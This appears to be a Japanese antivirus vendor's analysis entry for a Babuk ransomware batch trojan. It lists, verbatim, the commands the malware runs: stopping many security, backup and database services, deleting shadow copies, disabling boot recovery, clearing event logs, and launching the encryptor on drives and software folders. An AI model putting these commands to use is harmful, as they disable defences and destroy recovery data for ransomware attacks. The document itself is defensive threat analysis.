Trojan.BAT.BABUK.YACGY

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のプロセスを追加します。

• {Malware Fullpath}\HelpPane.exe → Detected as Trojan.Win32.KILLAV.WLEBB
• taskkill /f /im sqlservr.exe
• net stop VSS /y
• net stop HealthTLService /y
• net stop ThreatLockerService /y
• net stop "Veritas System Recovery" /y
• net stop EPIntegrationService /y
• net stop EPProtectedService /y
• net stop EPRedline /y
• net stop EPSecurityService /y
• net stop "Client Agent 7.60" /y
• net stop WRSVC /y
• net stop SQLAgent$SYSTEM_BGC /y
• net stop "Sophos Device Control Service" /y
• net stop macmnsvc /y
• net stop SQLAgent$ECWDB2 /y
• net stop "Zoolz 2 Service" /y
• net stop McTaskManager /y
• net stop "Sophos AutoUpdate Service" /y
• net stop "Sophos System Protection Service" /y
• net stop EraserSvc11710 /y
• net stop PDVFSService /y
• net stop SQLAgent$PROFXENGAGEMENT /y
• net stop SAVService /y
• net stop MSSQLFDLauncher$TPSAMA /y
• net stop SQLAgent$SOPHOS /y
• net stop "Symantec System Recovery" /y
• net stop Antivirus /y
• net stop SstpSvc /y
• net stop MSOLAP$SQL_2008 /y
• net stop TrueKeyServiceHelper /y
• net stop sacsvr /y
• net stop VeeamNFSSvc /y
• net stop FA_Scheduler /y
• net stop SAVAdminService /y
• net stop EPUpdateService /y
• net stop VeeamTransportSvc /y
• net stop "Sophos Health Service" /y
• net stop bedbg /y
• net stop MSSQLSERVER /y
• net stop KAVFS /y
• net stop Smcinst /y
• net stop MSSQLServerADHelper100 /y
• net stop TmCCSF /y
• net stop wbengine /y
• net stop SQLWriter /y
• net stop MSSQLFDLauncher$TPS /y
• net stop SmcService /y
• net stop ReportServer$TPSAMA /y
• net stop swi_update /y
• net stop AcrSch2Svc /y
• net stop MSSQL$SYSTEM_BGC /y
• net stop VeeamBrokerSvc /y
• net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
• net stop VeeamDeploymentService /y
• net stop SQLAgent$TPS /y
• net stop DCAgent /y
• net stop "Sophos Message Router" /y
• net stop MSSQLFDLauncher$SBSMONITORING /y
• net stop MySQL80 /y
• net stop MSOLAP$SYSTEM_BGC /y
• net stop ReportServer$TPS /y
• net stop MSSQL$ECWDB2 /y
• net stop SntpService /y
• net stop SQLSERVERAGENT /y
• net stop BackupExecManagementService /y
• net stop SMTPSvc /y
• net stop mfefire /y
• net stop BackupExecRPCService /y
• net stop MSSQL$VEEAMSQL2008R2 /y
• net stop klnagent /y
• net stop MSExchangeSA /y
• net stop MSSQLServerADHelper /y
• net stop SQLTELEMETRY /y
• net stop "Sophos Clean Service" /y
• net stop swi_update_64 /y
• net stop "Sophos Web Control Service" /y
• net stop EhttpSrv /y
• net stop POP3Svc /y
• net stop MSOLAP$TPSAMA /y
• net stop McAfeeEngineService /y
• net stop "Veeam Backup Catalog Data Service" /y
• net stop MSSQL$SBSMONITORING /y
• net stop ReportServer$SYSTEM_BGC /y
• net stop AcronisAgent /y
• net stop KAVFSGT /y
• net stop BackupExecDeviceMediaService /y
• net stop MySQL57 /y
• net stop McAfeeFrameworkMcAfeeFramework /y
• net stop TrueKey /y
• net stop VeeamMountSvc /y
• net stop MsDtsServer110 /y
• net stop SQLAgent$BKUPEXEC /y
• net stop UI0Detect /y
• net stop ReportServer /y
• net stop SQLTELEMETRY$ECWDB2 /y
• net stop MSSQLFDLauncher$SYSTEM_BGC /y
• net stop MSSQL$BKUPEXEC /y
• net stop SQLAgent$PRACTTICEBGC /y
• net stop MSExchangeSRS /y
• net stop SQLAgent$VEEAMSQL2008R2 /y
• net stop McShield /y
• net stop SepMasterService /y
• net stop "Sophos MCS Client" /y
• net stop VeeamCatalogSvc /y
• net stop SQLAgent$SHAREPOINT /y
• net stop NetMsmqActivator /y
• net stop kavfsslp /y
• net stop tmlisten /y
• net stop ShMonitor /y
• net stop MsDtsServer /y
• net stop SQLAgent$SQL_2008 /y
• net stop SDRSVC /y
• net stop IISAdmin /y
• net stop SQLAgent$PRACTTICEMGT /y
• net stop BackupExecJobEngine /y
• net stop BackupExecAgentBrowser /y
• net stop VeeamHvIntegrationSvc /y
• net stop masvc /y
• net stop W3Svc /y
• net stop "SQLsafe Backup Service" /y
• net stop SQLAgent$CXDB /y
• net stop SQLBrowser /y
• net stop MSSQLFDLauncher$SQL_2008 /y
• net stop VeeamBackupSvc /y
• net stop "Sophos Safestore Service" /y
• net stop svcGenericHost /y
• net stop ntrtscan /y
• net stop SQLAgent$VEEAMSQL2012 /y
• net stop MSExchangeMGMT /y
• net stop SamSs /y
• net stop MSExchangeES /y
• net stop MBAMService /y
• net stop EsgShKernel /y
• net stop ESHASRV /y
• net stop MSSQL$TPSAMA /y
• net stop SQLAgent$CITRIX_METAFRAME /y
• net stop VeeamCloudSvc /y
• net stop "Sophos File Scanner Service" /y
• net stop "Sophos Agent" /y
• net stop MBEndpointAgent /y
• net stop swi_service /y
• net stop MSSQL$PRACTICEMGT /y
• net stop SQLAgent$TPSAMA /y
• net stop McAfeeFramework /y
• net stop "Enterprise Client Service" /y
• net stop SQLAgent$SBSMONITORING /y
• net stop MSSQL$VEEAMSQL2012 /y
• net stop swi_filter /y
• net stop SQLSafeOLRService /y
• net stop BackupExecVSSProvider /y
• net stop VeeamEnterpriseManagerSvc /y
• net stop SQLAgent$SQLEXPRESS /y
• net stop OracleClientCache80 /y
• net stop MSSQL$PROFXENGAGEMENT /y
• net stop IMAP4Svc /y
• net stop ARSM /y
• net stop MSExchangeIS /y
• net stop AVP /y
• net stop MSSQLFDLauncher /y
• net stop MSExchangeMTA /y
• net stop TrueKeyScheduler /y
• net stop MSSQL$SOPHOS /y
• net stop "SQL Backups" /y
• net stop MSSQL$TPS /y
• net stop mfemms /y
• net stop MsDtsServer100 /y
• net stop MSSQL$SHAREPOINT /y
• net stop mfevtp /y
• net stop msftesql$PROD /y
• net stop mozyprobackup /y
• net stop MSSQL$SQL_2008 /y
• net stop SNAC /y
• net stop ReportServer$SQL_2008 /y
• net stop BackupExecAgentAccelerator /y
• net stop MSSQL$SQLEXPRESS /y
• net stop MSSQL$PRACTTICEBGC /y
• net stop VeeamRESTSvc /y
• net stop sophossps /y
• net stop ekrn /y
• net stop MMS /y
• net stop "Sophos MCS Agent" /y
• net stop RESvc /y
• net stop "Acronis VSS Provider" /y
• net stop MSSQLFDLauncher$SHAREPOINT /y
• net stop "SQLsafe Filter Service" /y
• net stop MSSQL$PROD /y
• net stop SQLAgent$PROD /y
• net stop MSOLAP$TPS /y
• net stop VeeamDeploySvc /y
• net stop MSSQLServerOLAPService /y
• net stop "SQL Server (MSSQLSERVER)" /y
• net stop "SQL Server (SQLEXPRESS)" /y
• net stop "SQL Server Analysis Services (MSSQLSERVER)" /y
• net stop "SQL Server Integration Services 11.0" /y
• net stop "SQL Server Reporting Services (MSSQLSERVER)" /y
• net stop "SQL Server VSS Writer" /y
• bcdedit /set {default} recoveryenabled No
• bcdedit /set {default} bootstatuspolicy ignoreallfailures
• wmic SHADOWCOPY /nointeractive
• wevtutil cl security
• wevtutil cl system
• wevtutil cl application
• vssadmin delete shadows /all /quiet
• net stop mhyprot2 /y
• {Malware Fullpath}\svchost.exe → Detected as Ransom.Win32.BABUK.YACGY
• {Malware Fullpath}\svchost.exe -paths="C:\Program Files\Microsoft SQL Server"
• {Malware Fullpath}\svchost.exe -paths="C:\Program Files (x86)\Microsoft SQL Server"
• {Malware Fullpath}\svchost.exe -paths="D:\Program Files\Microsoft SQL Server"
• {Malware Fullpath}\svchost.exe -paths="D:\Program Files (x86)\Microsoft SQL Server"
• {Malware Fullpath}\svchost.exe -paths="E:\Program Files\Microsoft SQL Server"
• {Malware Fullpath}\svchost.exe -paths="E:\Program Files (x86)\Microsoft SQL Server"
• {Malware Fullpath}\svchost.exe -paths="F:\Program Files\Microsoft SQL Server"
• {Malware Fullpath}\svchost.exe -paths="F:\Program Files (x86)\Microsoft SQL Server"
• {Malware Fullpath}\svchost.exe -paths="C:\Program Files (x86)\Tally.ERP9"
• {Malware Fullpath}\svchost.exe -paths="D:\Program Files (x86)\Tally.ERP9"
• {Malware Fullpath}\svchost.exe -paths="E:\Program Files (x86)\Tally.ERP9"
• {Malware Fullpath}\svchost.exe -paths="F:\Program Files (x86)\Tally.ERP9"
• {Malware Fullpath}\svchost.exe -paths="C:\Program Files (x86)\Intuit"
• {Malware Fullpath}\svchost.exe -paths="C:\Program Files\Intuit"
• {Malware Fullpath}\svchost.exe -paths=C:
• {Malware Fullpath}\svchost.exe -paths=D:
• {Malware Fullpath}\svchost.exe -paths=E:
• {Malware Fullpath}\svchost.exe -paths=Q:
• {Malware Fullpath}\svchost.exe -paths=F:
• {Malware Fullpath}\svchost.exe -paths=G:
• {Malware Fullpath}\svchost.exe -paths=H:
• {Malware Fullpath}\svchost.exe -paths=I:
• {Malware Fullpath}\svchost.exe -paths=Y:

他のシステム変更

マルウェアは、以下のファイルを削除します。

• {Malware Fullpath}\mhyprot2.sys